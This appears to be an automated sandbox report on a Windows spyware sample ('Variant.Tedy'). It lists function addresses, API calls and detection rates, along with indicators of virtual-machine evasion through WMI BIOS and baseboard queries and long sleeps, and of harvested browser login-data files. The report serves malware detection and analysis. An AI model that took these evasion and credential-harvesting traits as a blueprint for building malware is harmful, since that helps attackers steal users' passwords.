                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768BBEB000_2_00007FF768BBEB00
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768C27AA30_2_00007FF768C27AA3
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768C6AA200_2_00007FF768C6AA20
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768C96A530_2_00007FF768C96A53
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768BC5A3B0_2_00007FF768BC5A3B
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768C52BF00_2_00007FF768C52BF0
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768B72BF90_2_00007FF768B72BF9
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768C88BFF0_2_00007FF768C88BFF
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768BF5C140_2_00007FF768BF5C14
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768C89BF90_2_00007FF768C89BF9
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768BCCB650_2_00007FF768BCCB65
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768C75B400_2_00007FF768C75B40
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768BB5CA00_2_00007FF768BB5CA0
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768BB6C900_2_00007FF768BB6C90
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768BADC1A0_2_00007FF768BADC1A
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768BB3E130_2_00007FF768BB3E13
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768BC5DD00_2_00007FF768BC5DD0
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768BB0DD00_2_00007FF768BB0DD0
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768BC5D3D0_2_00007FF768BC5D3D
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768BCFEAC0_2_00007FF768BCFEAC
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768BA8ED60_2_00007FF768BA8ED6
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768BEBED00_2_00007FF768BEBED0
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768B80ED60_2_00007FF768B80ED6
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768BC5E650_2_00007FF768BC5E65
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768BAEE6D0_2_00007FF768BAEE6D
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768BC6E7F0_2_00007FF768BC6E7F
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768C7CE1C0_2_00007FF768C7CE1C
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768BC0E400_2_00007FF768BC0E40
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768B8EE4C0_2_00007FF768B8EE4C
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768BD1FE30_2_00007FF768BD1FE3
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768C5F0000_2_00007FF768C5F000
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768C59FA50_2_00007FF768C59FA5
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768BA8FC00_2_00007FF768BA8FC0
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768BA8FBB0_2_00007FF768BA8FBB
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768BA8FD50_2_00007FF768BA8FD5
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768BBB0E00_2_00007FF768BBB0E0
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768BB71100_2_00007FF768BB7110
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768C8C0FD0_2_00007FF768C8C0FD
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768C6C0A00_2_00007FF768C6C0A0
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768BF00B80_2_00007FF768BF00B8
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768BB60D00_2_00007FF768BB60D0
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768BF219B0_2_00007FF768BF219B
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768C591A00_2_00007FF768C591A0
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768BAF15D0_2_00007FF768BAF15D
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768B8D15E0_2_00007FF768B8D15E
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768C781800_2_00007FF768C78180
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768BF11240_2_00007FF768BF1124
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768B902F00_2_00007FF768B902F0
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768DBE2F00_2_00007FF768DBE2F0
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768C442F70_2_00007FF768C442F7
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768C733000_2_00007FF768C73300
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768BAD2BB0_2_00007FF768BAD2BB
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768C7F24B0_2_00007FF768C7F24B
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768BF824D0_2_00007FF768BF824D
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768C8B3DD0_2_00007FF768C8B3DD
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768D083F40_2_00007FF768D083F4
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768C933970_2_00007FF768C93397
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768C8E3C80_2_00007FF768C8E3C8
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768B833D60_2_00007FF768B833D6
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768BB83600_2_00007FF768BB8360
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768BF83280_2_00007FF768BF8328
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768B804F60_2_00007FF768B804F6
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: String function: 00007FF768DBA1E0 appears 120 times
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768C5CEC0 HeapFree,NtWriteFile,NtWriteFile,WaitForSingleObject,0_2_00007FF768C5CEC0
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768C640C0 NtReadFile,NtReadFile,WaitForSingleObject,NtReadFile,GetModuleHandleA,GetProcAddress,0_2_00007FF768C640C0
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768BF5042 AcquireSRWLockExclusive,AcquireSRWLockExclusive,NtCreateFile,RtlNtStatusToDosError,CreateIoCompletionPort,SetFileCompletionNotificationModes,GetLastError,CloseHandle,0_2_00007FF768BF5042
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768BF48BE AcquireSRWLockExclusive,AcquireSRWLockExclusive,AcquireSRWLockExclusive,NtDeviceIoControlFile,RtlNtStatusToDosError,AcquireSRWLockExclusive,AcquireSRWLockExclusive,AcquireSRWLockExclusive,AcquireSRWLockExclusive,AcquireSRWLockExclusive,0_2_00007FF768BF48BE
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768BF33D9 NtCancelIoFileEx,RtlNtStatusToDosError,0_2_00007FF768BF33D9
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768BF48BE: AcquireSRWLockExclusive,AcquireSRWLockExclusive,AcquireSRWLockExclusive,NtDeviceIoControlFile,RtlNtStatusToDosError,AcquireSRWLockExclusive,AcquireSRWLockExclusive,AcquireSRWLockExclusive,AcquireSRWLockExclusive,AcquireSRWLockExclusive,0_2_00007FF768BF48BE
                  Source: SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeReversingLabs: Detection: 23%
                  Source: SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeVirustotal: Detection: 16%
                  Source: SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "Get-Culture | Select -ExpandProperty DisplayName
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "Get-Culture | Select -ExpandProperty DisplayNameJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM Win32_Processor
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile created: C:\Users\user\AppData\Local\Temp\Tf1fTKN9EhSgWt7S8swS8tNH3PELke\Jump to behavior
                  Source: SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeBinary string: \Device\Afd\Mio
                  Source: SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeBinary string: Failed to open \Device\Afd\Mio: 8
                  Source: classification engineClassification label: mal76.troj.spyw.evad.winEXE@4/63@2/2
                  Source: SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe, 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe, 00000000.00000000.245071773.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                  Source: SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe, 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe, 00000000.00000000.245071773.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                  Source: SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe, 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe, 00000000.00000000.245071773.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                  Source: SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe, 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe, 00000000.00000000.245071773.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                  Source: SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe, 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe, 00000000.00000000.245071773.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                  Source: SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe, 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe, 00000000.00000000.245071773.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                  Source: browser_default_login_data.0.dr, opera stable_default_login_data.0.dr, microsoft_default_login_data.0.dr, google_default_login_data.0.dr, coccoc_default_login_data.0.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe, 00000000.00000002.272943427.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe, 00000000.00000000.245071773.00007FF768DC0000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6032:120:WilError_01
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                  Source: SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeStatic PE information: Image base 0x140000000 > 0x60000000
                  Source: SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeStatic file information: File size 3288576 > 1048576
                  Source: SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x24e200
                  Source: SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeCode function: 0_2_00007FF768BCC1B8 push rbp; retf 0_2_00007FF768BCC1B9
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT SerialNumber FROM Win32_BaseBoard
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6024Thread sleep count: 7884 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6012Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4148Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5160Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7884Jump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM Win32_Processor
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
